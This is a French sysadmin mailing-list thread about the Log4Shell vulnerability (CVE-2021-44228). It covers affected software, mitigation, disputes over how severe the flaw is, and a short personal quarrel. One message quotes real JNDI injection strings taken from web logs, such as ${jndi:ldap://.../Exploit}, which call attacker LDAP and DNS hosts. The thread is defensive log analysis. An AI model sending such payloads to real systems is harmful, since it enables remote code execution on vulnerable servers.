Pour ceux qui l’auraient raté:
https://nvd.nist.gov/vuln/detail/CVE-2021-44228 https://nvd.nist.gov/vuln/detail/CVE-2021-44228
Bonjour,
il faut être dans une grotte pour l'avoir raté :D
Ceci est un message pour faire décompresser ceux qui ont dû oeuvrer ce week end et ce matin \o/
Bon courage.
David
On Mon, 13 Dec 2021 13:18:50 +0100 David Ponzone david.ponzone@gmail.com wrote:
Pour ceux qui l’auraient raté:
https://nvd.nist.gov/vuln/detail/CVE-2021-44228 https://nvd.nist.gov/vuln/detail/CVE-2021-44228
Bonjour,
Pour info et si ça peut aider, un topic dédié a été fait sur le forum CHATONS pour savoir quelles applis sont impactés dans le collectif (et pas que) et pour donner quelques pistes pour mitiger l'attaque : https://forum.chatons.org/t/log4j-java-et-cve-2021-44228-log4shell/3069
Ça peut toujours servir :)
Bon courage et bonne journée,
Bonjour -- Dans la même veine, il n'y a pas que ceux qui paniquent. C'est noël, pensez à tous ces gamins qui exploitent et s'éclatent comme des fous ! OK ==>[] (: Véro
Le 13/12/2021 à 13:24, David Durieux a écrit :
Bonjour,
il faut être dans une grotte pour l'avoir raté :D
Ceci est un message pour faire décompresser ceux qui ont dû oeuvrer ce week end et ce matin \o/
Bon courage.
David
On Mon, 13 Dec 2021 13:18:50 +0100 David Ponzone david.ponzone@gmail.com wrote:
Pour ceux qui l’auraient raté:
https://nvd.nist.gov/vuln/detail/CVE-2021-44228 https://nvd.nist.gov/vuln/detail/CVE-2021-44228
Liste de diffusion du FRsAG http://www.frsag.org/
Bonjour,
Le 13/12/2021 à 14:48, Véronique Loquet a écrit :
Bonjour -- Dans la même veine, il n'y a pas que ceux qui paniquent. C'est noël, pensez à tous ces gamins qui exploitent et s'éclatent comme des fous ! OK ==>[] (: Véro
Il y a aussi les cuistres qui n'y connaissent rien et se permettent du mauvais humour en attendant Noël. Plus personne ne croit à ces histoires de gamin-es qui s'éclatent pendant les vacances car les gamin-es meurent aussi, et malheureusement, dans les hôpitaux pilonnés par les ransomwares déployés par les réseaux mafieux contre lesquels nous nous battons.
Merci d'éviter les amalgames, courage aux équipes, et que vive la jeunesse libre.
Bien cordialement,
Hello,
Effectivement, noël est proche, alors si on peut tenter de rester bienveillant, ça serait top =)
Gabriel
Cordialement,
On 2021-12-13 16:22, Maxime DERCHE wrote:
Bonjour,
Le 13/12/2021 à 14:48, Véronique Loquet a écrit :
Bonjour -- Dans la même veine, il n'y a pas que ceux qui paniquent. C'est noël, pensez à tous ces gamins qui exploitent et s'éclatent comme des fous ! OK ==>[] (: Véro
Il y a aussi les cuistres qui n'y connaissent rien et se permettent du mauvais humour en attendant Noël. Plus personne ne croit à ces histoires de gamin-es qui s'éclatent pendant les vacances car les gamin-es meurent aussi, et malheureusement, dans les hôpitaux pilonnés par les ransomwares déployés par les réseaux mafieux contre lesquels nous nous battons.
Merci d'éviter les amalgames, courage aux équipes, et que vive la jeunesse libre.
Bien cordialement,
Bonjour Gabriel,
Le 13/12/2021 à 16:35, Gabriel Corré a écrit :
Hello,
Effectivement, noël est proche, alors si on peut tenter de rester bienveillant, ça serait top =)
Ah je suis très agacé par l'intervention intempestive, déplacée et franchement désagréable à lire de Madame Locquet, qui est coutumière du fait depuis plus d'une décennie que je la croise ici ou là, mais toujours bienveillant. :)
J'espère que vous avez également contacté la personne pour vous enquérir de sa bienveillance. Vous vous serez peut-être même rendu compte qu'elle est secondaire par rapport au show-business de la sécurité-spectacle que propose son agence de communication. :p
Bien cordialement,
Le 13/12/2021 à 18:16, Maxime DERCHE a écrit :
Bonjour Gabriel,
Le 13/12/2021 à 16:35, Gabriel Corré a écrit :
Hello,
Effectivement, noël est proche, alors si on peut tenter de rester bienveillant, ça serait top =)
Ah je suis très agacé par l'intervention intempestive, déplacée et franchement désagréable à lire de Madame Locquet, qui est coutumière du fait depuis plus d'une décennie que je la croise ici ou là, mais toujours bienveillant. :)
J'espère que vous avez également contacté la personne pour vous enquérir de sa bienveillance. Vous vous serez peut-être même rendu compte qu'elle est secondaire par rapport au show-business de la sécurité-spectacle que propose son agence de communication. :p
Bien cordialement,
Le boulet de la soirée, évidemment c'est une longue journée après un gros week-end, j'ai pas vu que la liste était en copie, je voulais répondre en privé, je n'ai pas vérifié avant de valider, me voilà fautif. Je suis puni par là où j'ai péché : je n'aurais pas dû répondre.
Mes excuses pour ce mauvais débordement, et sanction acceptée s'il y en a une.
Bien cordialement,
Le 13/12/2021 à 18:27, Maxime DERCHE a écrit :
Le 13/12/2021 à 18:16, Maxime DERCHE a écrit :
Ah je suis très agacé par l'intervention intempestive, déplacée et franchement désagréable à lire de Madame Locquet, qui est coutumière du fait depuis plus d'une décennie que je la croise ici ou là, mais toujours bienveillant. :)
J'espère que vous avez également contacté la personne pour vous enquérir de sa bienveillance. Vous vous serez peut-être même rendu compte qu'elle est secondaire par rapport au show-business de la sécurité-spectacle que propose son agence de communication. :p
Bien cordialement,
Le boulet de la soirée, évidemment c'est une longue journée après un gros week-end, j'ai pas vu que la liste était en copie, je voulais répondre en privé, je n'ai pas vérifié avant de valider, me voilà fautif. Je suis puni par là où j'ai péché : je n'aurais pas dû répondre.
Mes excuses pour ce mauvais débordement, et sanction acceptée s'il y en a une.
Ha même en "privé" ça se lâche!
Désolé mais pour moi Véronique a une bien meilleure réputation que ce que vous présentez. Par contre la votre elle vient d'en prendre un sacré coup.
Le 13/12/2021 à 16:22, Maxime DERCHE a écrit :
Bonjour,
Le 13/12/2021 à 14:48, Véronique Loquet a écrit :
Bonjour -- Dans la même veine, il n'y a pas que ceux qui paniquent. C'est noël, pensez à tous ces gamins qui exploitent et s'éclatent comme des fous ! OK ==>[] (: Véro
Il y a aussi les cuistres qui n'y connaissent rien et se permettent du mauvais humour en attendant Noël. Plus personne ne croit à ces histoires de gamin-es qui s'éclatent pendant les vacances car les gamin-es meurent aussi, et malheureusement, dans les hôpitaux pilonnés par les ransomwares déployés par les réseaux mafieux contre lesquels nous nous battons.
Merci d'éviter les amalgames, courage aux équipes, et que vive la jeunesse libre.
Un peu agressif de parler ainsi non?
Malheureusement des gamins "petits cons" qui se font les dents en se mettant des challenges idiots et destructeurs, on en croise bien trop régulièrement. Et le pire c'est qu'ils sont bons les bougres!
Les équipes de pirates étatiques (US, Israel, Corée du Nord, Chine, ...) ne se rabaissent pas à venir exploiter une 0day qui vient juste d'être publié, ça laisserait trop de trace. Eux sont déjà passé avant et ont déjà exploité avant que ça soit connu.
Donc pour moi Véronique a bien visé, avec l'arrivée des fêtes, beaucoup de gamins qui suivent les CVE bêtement et qui vont aller trouver un bout de code sur exploitdb vont vouloir juste trouver un serveur pour tester et jouer un peu.
D'autres plus avancés avec un profil apte à entrer dans un groupement étatique vont sans doute s'y risquer aussi. Au final que ça soit un remote shell, une cryptorançon ou une destruction pure et simple, oui ces infras vont vivres quelques semaines intenses.
Merci Véronique pour se rappel fort utile quand j'ai déjà entendu un client me dire qu'il n'était pas concerné (un simple Jitsi) alors que son application était vulnérable, bon ben on lui a quand même corrigé.
Je suis prêt à parier qu'il va y avoir une belle attaque grâce à tout cela, un nouveau record de DDOS, un mega réseau C&C? Les paris sont ouverts.
On 13 Dec 2021, at 13:18, David Ponzone david.ponzone@gmail.com wrote:
Pour ceux qui l’auraient raté:
Qui utilise encore Apache de nos jours ?
V.
A peu près autant de monde que Nginx (un coin moins, certes).
Le 13 déc. 2021 à 14:53, Vincent Habchi vincent@geomag.fr a écrit :
On 13 Dec 2021, at 13:18, David Ponzone david.ponzone@gmail.com wrote:
Pour ceux qui l’auraient raté:
Qui utilise encore Apache de nos jours ?
V.
Liste de diffusion du FRsAG http://www.frsag.org/
Qui n'a plus de legacy de nos jours ?
Le lun. 13 déc. 2021 à 14:54, Vincent Habchi vincent@geomag.fr a écrit :
On 13 Dec 2021, at 13:18, David Ponzone david.ponzone@gmail.com wrote:
Pour ceux qui l’auraient raté:
Qui utilise encore Apache de nos jours ?
V.
Liste de diffusion du FRsAG http://www.frsag.org/
Bonjour,
Tentons de reprendre le cours normal de ce thread : j'ai passé la journée d'hier à tenter d'exploiter la faille sur des trucs 'legacy' justement un peu partout et j'ai été très surpris de la faible surface d'attaque que nous avons par rapport aux cris d’orfraies que j'ai pu lire et ici là.
Alors, on a très peu de trucs en Java, langage que je fuis depuis quelques années déjà par respect pour la RAM de mes machines mais en gros, à part Graylog, rien vu à mettre à jour en urgence.
Zimbra, pas touché Puppet, pas touché Big Blue Button, pas touché
Unifi est touché à priori mais je n'ai pas réussi à l'exploiter avant de passer -Dlog4j2.formatMsgNoLookups=true
Si quelqu'un veut un test d'exploitation sur un service vulnérable, j'ai un bout de script qui se contente de faire un 'touch /tmp/pwned'
Bonne journée,
Julien
Le 13/12/2021 à 15:18, Seb Astien a écrit :
Qui n'a plus de legacy de nos jours ?
Le lun. 13 déc. 2021 à 14:54, Vincent Habchi <vincent@geomag.fr mailto:vincent@geomag.fr> a écrit :
> On 13 Dec 2021, at 13:18, David Ponzone <david.ponzone@gmail.com <mailto:david.ponzone@gmail.com>> wrote: > > Pour ceux qui l’auraient raté: Qui utilise encore Apache de nos jours ? V. _______________________________________________ Liste de diffusion du FRsAG http://www.frsag.org/ <http://www.frsag.org/>
Liste de diffusion du FRsAG http://www.frsag.org/
Bonjour,
Ton retour est complètement biaisé
"j'ai été très surpris de la faible surface d'attaque " "on a très peu de trucs en Java, langage que je fuis depuis quelques années"
c'est une attaque lié à JAVA, donc si tu évite d'en avoir tu risque pas d'être très touché.
C'est comme si tu disais que tu évite les serveurs Microsoft mais que tu sois surpris de la faible surface d'attaque sur le RDP \o/
Il y a des gens qui ont pas mal d'applications en JAVA (et il y en a énormément).
Ce message est juste pour éviter de minimiser ce problème de log4j.
Sur mes serveurs, j'ai eu des tentatives d'attaques (logs web) depuis le 10 décembre.
David Durieux
On Tue, 14 Dec 2021 09:02:47 +0100 Julien Escario julien.escario@altinea.fr wrote:
Bonjour,
Tentons de reprendre le cours normal de ce thread : j'ai passé la journée d'hier à tenter d'exploiter la faille sur des trucs 'legacy' justement un peu partout et j'ai été très surpris de la faible surface d'attaque que nous avons par rapport aux cris d’orfraies que j'ai pu lire et ici là.
Alors, on a très peu de trucs en Java, langage que je fuis depuis quelques années déjà par respect pour la RAM de mes machines mais en gros, à part Graylog, rien vu à mettre à jour en urgence.
Zimbra, pas touché Puppet, pas touché Big Blue Button, pas touché
Unifi est touché à priori mais je n'ai pas réussi à l'exploiter avant de passer -Dlog4j2.formatMsgNoLookups=true
Si quelqu'un veut un test d'exploitation sur un service vulnérable, j'ai un bout de script qui se contente de faire un 'touch /tmp/pwned'
Bonne journée,
Julien
Le 13/12/2021 à 15:18, Seb Astien a écrit :
Qui n'a plus de legacy de nos jours ?
Le lun. 13 déc. 2021 à 14:54, Vincent Habchi <vincent@geomag.fr mailto:vincent@geomag.fr> a écrit :
> On 13 Dec 2021, at 13:18, David Ponzone > <david.ponzone@gmail.com <mailto:david.ponzone@gmail.com>> wrote: > > Pour ceux qui l’auraient raté: Qui utilise encore Apache de nos jours ? V. _______________________________________________ Liste de diffusion du FRsAG http://www.frsag.org/ <http://www.frsag.org/>
Liste de diffusion du FRsAG http://www.frsag.org/
Le 14/12/2021 à 09:53, David Durieux a écrit :
Bonjour,
Ton retour est complètement biaisé
"j'ai été très surpris de la faible surface d'attaque " "on a très peu de trucs en Java, langage que je fuis depuis quelques années"
c'est une attaque lié à JAVA, donc si tu évite d'en avoir tu risque pas d'être très touché.
C'est comme si tu disais que tu évite les serveurs Microsoft mais que tu sois surpris de la faible surface d'attaque sur le RDP \o/
OK, bonne ambiance ! Tu pourrais limiter ton commentaire à dire que l'avis des autres ne t’intéresse pas.
Évidemment que mon retour est biaisé, lequel ne l'est pas ?
Pourquoi ai-je précisé que nous avions peu de choses basées sur Java et que j'ai ensuite listé les applications que j'ai repérées/testées ? Ca permet de mettre ce que l'on appelle communément du contexte et de juger de la profondeur du biais justement.
Il y a des gens qui ont pas mal d'applications en JAVA (et il y en a énormément).
Et tu as une source pour ton affirmation ? Énormément, c'est quoi ? Combien utilisent log4j ?
Du coup, si tu veux faire un commentaire utile, entre les boites de sécurité qui annoncent ça comme la faille de la décennie et mon vécu avec très peu d'impact, tu as un retour factuel à faire ?
Ce message est juste pour éviter de minimiser ce problème de log4j.
Le problème est évidemment sérieux puisque exploitable publiquement sur des services généralement exposés. Mais encore une fois, je me demande si la surface d'attaque est aussi importante qu'annoncé.
Par contre, lorsque la faille est présente, le service est très facile à violer. Le CVSS3 tiens compte de ces deux aspects.
Sur mes serveurs, j'ai eu des tentatives d'attaques (logs web) depuis le 10 décembre.
Oui, même chose. De même, j'ai plusieurs milliers de tentatives de brute force SSH chaque minute sur les serveurs pour lesquels ce n'est pas firewallé. Ce n'est pas pour autant que je fais ma drama-queen sécuritaire.
Julien
On Tue, Dec 14, 2021 at 10:18 AM Julien Escario julien.escario@altinea.fr wrote:
C'est comme si tu disais que tu évite les serveurs Microsoft mais que tu sois surpris de la faible surface d'attaque sur le RDP \o/
OK, bonne ambiance ! Tu pourrais limiter ton commentaire à dire que l'avis des autres ne t’intéresse pas.
Depuis 2 ans j'ai les mêmes mots de l'année : tolérance et bienveillance.
Et tu as une source pour ton affirmation ? Énormément, c'est quoi ? Combien utilisent log4j ?
Du coup, si tu veux faire un commentaire utile, entre les boites de sécurité qui annoncent ça comme la faille de la décennie et mon vécu avec très peu d'impact, tu as un retour factuel à faire ?
Nous avons plusieurs logiciels impactés (qui utilisent log4j ou dont
l'éditeur traite la faille, je n'ai fait aucun test pour le coup), aucun "internet facing" : - vmware (vcenter, orchestrator, nsx) - des logiciels de gestion de baies de stackage - rundeck - symantec antivirus
Tous les services java, serveurs d'appli jboss, websphere, etc sont vulnérables dès lors qu'ils sont joignables (ils sont derrière des reverse proxies qui peuvent protéger, si ils sont configurés pour....). La menace peut aussi être interne, même si on a tendance à la minimiser...
Mes 2 cents,
Jeremy
My two cents concernant le "énormément" : le NCSC (équiv. ANSSI aux Pays-Bas) a mis en ligne un dépôt GitHub avec des indicateurs de compromission, ainsi qu'une liste des produits impactés/non impactés :
https://github.com/NCSC-NL/log4shell/tree/main/software
Sur 1600 entrées, environ 200 sont marquées comme vulnérables. Vous noterez que beaucoup de services cloud, chez AWS notamment, étaient vulnérables, mais ont été patchés depuis. Ce qui explique l'ampleur potentiel de l'impact, et pourquoi tout le monde s'est bougé ce week end pour évaluer ses produits et patcher si nécessaire.
-- Florian STOSSE | Ingénieur en sécurité informatique
Le mar. 14 déc. 2021 à 10:17, Julien Escario julien.escario@altinea.fr a écrit :
Le 14/12/2021 à 09:53, David Durieux a écrit :
Bonjour,
Ton retour est complètement biaisé
"j'ai été très surpris de la faible surface d'attaque " "on a très peu de trucs en Java, langage que je fuis depuis quelques
années"
c'est une attaque lié à JAVA, donc si tu évite d'en avoir tu risque pas d'être très touché.
C'est comme si tu disais que tu évite les serveurs Microsoft mais que tu sois surpris de la faible surface d'attaque sur le RDP \o/
OK, bonne ambiance ! Tu pourrais limiter ton commentaire à dire que l'avis des autres ne t’intéresse pas.
Évidemment que mon retour est biaisé, lequel ne l'est pas ?
Pourquoi ai-je précisé que nous avions peu de choses basées sur Java et que j'ai ensuite listé les applications que j'ai repérées/testées ? Ca permet de mettre ce que l'on appelle communément du contexte et de juger de la profondeur du biais justement.
Il y a des gens qui ont pas mal d'applications en JAVA (et il y en a énormément).
Et tu as une source pour ton affirmation ? Énormément, c'est quoi ? Combien utilisent log4j ?
Du coup, si tu veux faire un commentaire utile, entre les boites de sécurité qui annoncent ça comme la faille de la décennie et mon vécu avec très peu d'impact, tu as un retour factuel à faire ?
Ce message est juste pour éviter de minimiser ce problème de log4j.
Le problème est évidemment sérieux puisque exploitable publiquement sur des services généralement exposés. Mais encore une fois, je me demande si la surface d'attaque est aussi importante qu'annoncé.
Par contre, lorsque la faille est présente, le service est très facile à violer. Le CVSS3 tiens compte de ces deux aspects.
Sur mes serveurs, j'ai eu des tentatives d'attaques (logs web) depuis le 10 décembre.
Oui, même chose. De même, j'ai plusieurs milliers de tentatives de brute force SSH chaque minute sur les serveurs pour lesquels ce n'est pas firewallé. Ce n'est pas pour autant que je fais ma drama-queen sécuritaire.
Julien
Liste de diffusion du FRsAG http://www.frsag.org/
Bonjour,
Même approche (estimer la portée réelle de la menace avant de s'affoler) et même constat : cette "faille" rejoint la liste des appels à la panique inutiles, du moins pour ce qui me concerne.
Je relève une centaine "d'attaques" (avant blocage automatique), toutes depuis le 10/12/21 sur les Url :
${jndi:ldap://152.89.239.12:1389/bt2f6m} /$%7Bjndi:dns://45.83.64.1/securityscan-https443%7D /$%7Bjndi:ldap://167.71.13.196:2222/lx-ffff33fe1d7bbb0100fee1b661000000001ef879%7D /${jndi:dns:/45.83.64.1/securityscan-http80} /${jndi:dns:/45.83.64.1/securityscan-https443} /${jndi:ldap:/45.130.229.168:1389/Exploit} /${jndi:ldap:/45.83.193.150:1389/Exploit} /${jndi:ldaps:/a5384.probe001.log4j.leakix.net:8443/b}
qui retournent un 400, 403 ou 404 sur les quelques serveurs que je gère.
A noter que plus de 60% de ces attaques proviennent de 45.83.64.0/32 (Internet Security Research Project), ce qui conforte la suggestion de Maxime à propos des conflits d'intérêt de la part des acteurs œuvrant officiellement pour la lutte contre les pirates.
Cordialement,
Laurent Barme
Le 14/12/2021 à 09:02, Julien Escario a écrit :
Bonjour,
Tentons de reprendre le cours normal de ce thread : j'ai passé la journée d'hier à tenter d'exploiter la faille sur des trucs 'legacy' justement un peu partout et j'ai été très surpris de la faible surface d'attaque que nous avons par rapport aux cris d’orfraies que j'ai pu lire et ici là.
Alors, on a très peu de trucs en Java, langage que je fuis depuis quelques années déjà par respect pour la RAM de mes machines mais en gros, à part Graylog, rien vu à mettre à jour en urgence.
Zimbra, pas touché Puppet, pas touché Big Blue Button, pas touché
Unifi est touché à priori mais je n'ai pas réussi à l'exploiter avant de passer -Dlog4j2.formatMsgNoLookups=true
Si quelqu'un veut un test d'exploitation sur un service vulnérable, j'ai un bout de script qui se contente de faire un 'touch /tmp/pwned'
Bonne journée,
Julien
Le 13/12/2021 à 15:18, Seb Astien a écrit :
Qui n'a plus de legacy de nos jours ?
Le lun. 13 déc. 2021 à 14:54, Vincent Habchi <vincent@geomag.fr mailto:vincent@geomag.fr> a écrit :
> On 13 Dec 2021, at 13:18, David Ponzone <david.ponzone@gmail.com <mailto:david.ponzone@gmail.com>> wrote: > > Pour ceux qui l’auraient raté: Qui utilise encore Apache de nos jours ? V. _______________________________________________ Liste de diffusion du FRsAG http://www.frsag.org/
Liste de diffusion du FRsAG http://www.frsag.org/
Liste de diffusion du FRsAG http://www.frsag.org/
Dans les logiciels impactés que l'on a du mettre à jour rapidement, tous les Jitsi, c'est du Java en public donc bien vulnérable.
Et même si les Elasticsearch, Greylog et autre joyeuseté y compris du dev de nos clients sont cachés derrière des firewalls on a fait ce qu'il faut pour les logiciels avec des mises à jour et configuration et pour nos clients ont a prévenu et demandé des majs qu'on attend.
Le 14/12/2021 à 10:10, Laurent Barme a écrit :
Bonjour,
Même approche (estimer la portée réelle de la menace avant de s'affoler) et même constat : cette "faille" rejoint la liste des appels à la panique inutiles, du moins pour ce qui me concerne.
Je relève une centaine "d'attaques" (avant blocage automatique), toutes depuis le 10/12/21 sur les Url :
${jndi:ldap://152.89.239.12:1389/bt2f6m} /$%7Bjndi:dns://45.83.64.1/securityscan-https443%7D /$%7Bjndi:ldap://167.71.13.196:2222/lx-ffff33fe1d7bbb0100fee1b661000000001ef879%7D /${jndi:dns:/45.83.64.1/securityscan-http80} /${jndi:dns:/45.83.64.1/securityscan-https443} /${jndi:ldap:/45.130.229.168:1389/Exploit} /${jndi:ldap:/45.83.193.150:1389/Exploit} /${jndi:ldaps:/a5384.probe001.log4j.leakix.net:8443/b}
qui retournent un 400, 403 ou 404 sur les quelques serveurs que je gère.
A noter que plus de 60% de ces attaques proviennent de 45.83.64.0/32 (Internet Security Research Project), ce qui conforte la suggestion de Maxime à propos des conflits d'intérêt de la part des acteurs œuvrant officiellement pour la lutte contre les pirates.
Cordialement,
Laurent Barme
Le 14/12/2021 à 09:02, Julien Escario a écrit :
Bonjour,
Tentons de reprendre le cours normal de ce thread : j'ai passé la journée d'hier à tenter d'exploiter la faille sur des trucs 'legacy' justement un peu partout et j'ai été très surpris de la faible surface d'attaque que nous avons par rapport aux cris d’orfraies que j'ai pu lire et ici là.
Alors, on a très peu de trucs en Java, langage que je fuis depuis quelques années déjà par respect pour la RAM de mes machines mais en gros, à part Graylog, rien vu à mettre à jour en urgence.
Zimbra, pas touché Puppet, pas touché Big Blue Button, pas touché
Unifi est touché à priori mais je n'ai pas réussi à l'exploiter avant de passer -Dlog4j2.formatMsgNoLookups=true
Si quelqu'un veut un test d'exploitation sur un service vulnérable, j'ai un bout de script qui se contente de faire un 'touch /tmp/pwned'
Bonne journée,
Julien
Le 13/12/2021 à 15:18, Seb Astien a écrit :
Qui n'a plus de legacy de nos jours ?
Le lun. 13 déc. 2021 à 14:54, Vincent Habchi vincent@geomag.fr a écrit :
> On 13 Dec 2021, at 13:18, David Ponzone <david.ponzone@gmail.com> wrote: > > Pour ceux qui l’auraient raté: Qui utilise encore Apache de nos jours ? V. _______________________________________________ Liste de diffusion du FRsAG http://www.frsag.org/
Liste de diffusion du FRsAG http://www.frsag.org/
Liste de diffusion du FRsAG http://www.frsag.org/
Liste de diffusion du FRsAG http://www.frsag.org/
Le Tue, Dec 14, 2021 at 10:33:00AM +0100, Wallace [wallace@morkitu.org] a écrit:
Et même si les Elasticsearch, Greylog et autre joyeuseté y compris du dev de nos clients sont cachés derrière des firewalls on a fait ce qu'il faut pour les logiciels avec des mises à jour et configuration et pour nos clients ont a prévenu et demandé des majs qu'on attend.
Surtout qu'au delà de la RCE, tu as aussi le risque de fuite de données, puisque des variables peuvent passer dans un lookup dns, meme si le flux ne sort pas.
Ce n'est pas que Apache, ça concerne beaucoup de solutions JAVA.
Certains crient leur joie d'utiliser log4j 1.x qui est épargné (sauf si JNDI est activé, mais c'est relativement rare), mais la version 1.x n'est plus supporté, donc c'est une folie de l'utiliser...
David
On Mon, 13 Dec 2021 14:53:49 +0100 Vincent Habchi vincent@geomag.fr wrote:
On 13 Dec 2021, at 13:18, David Ponzone david.ponzone@gmail.com wrote:
Pour ceux qui l’auraient raté:
Qui utilise encore Apache de nos jours ?
V.
Liste de diffusion du FRsAG http://www.frsag.org/
Pour qui utilise Log4j, plein de monde : https://www.techsolvency.com/story-so-far/cve-2021-44228-log4j-log4shell/#af...
Si la question est sur le serveur HTTP Apache, ça n'a aucun rapport, ça n'est pas affecté par la faille.
Le lun. 13 déc. 2021 à 14:56, Vincent Habchi vincent@geomag.fr a écrit :
On 13 Dec 2021, at 13:18, David Ponzone david.ponzone@gmail.com wrote:
Pour ceux qui l’auraient raté:
Qui utilise encore Apache de nos jours ?
V.
Liste de diffusion du FRsAG http://www.frsag.org/
On lundi 13 décembre 2021 13:18:50 CET, David Ponzone wrote:
Pour ceux qui l’auraient raté:
Ce n'est pas complétement terminé, même si ca semble mois grave cette fois : https://www.openwall.com/lists/oss-security/2021/12/14/4
-
David Durieux -
David Ponzone -
Dominique Rousseau -
F. S. -
Gabriel Corré -
Jeremy Monnet -
Julien Escario -
Laurent Barme -
Maxime DERCHE -
Melanie Jacquart -
Seb Astien -
Vincent Finance -
Vincent Habchi -
Vincent Tondellier -
Véronique Loquet -
Wallace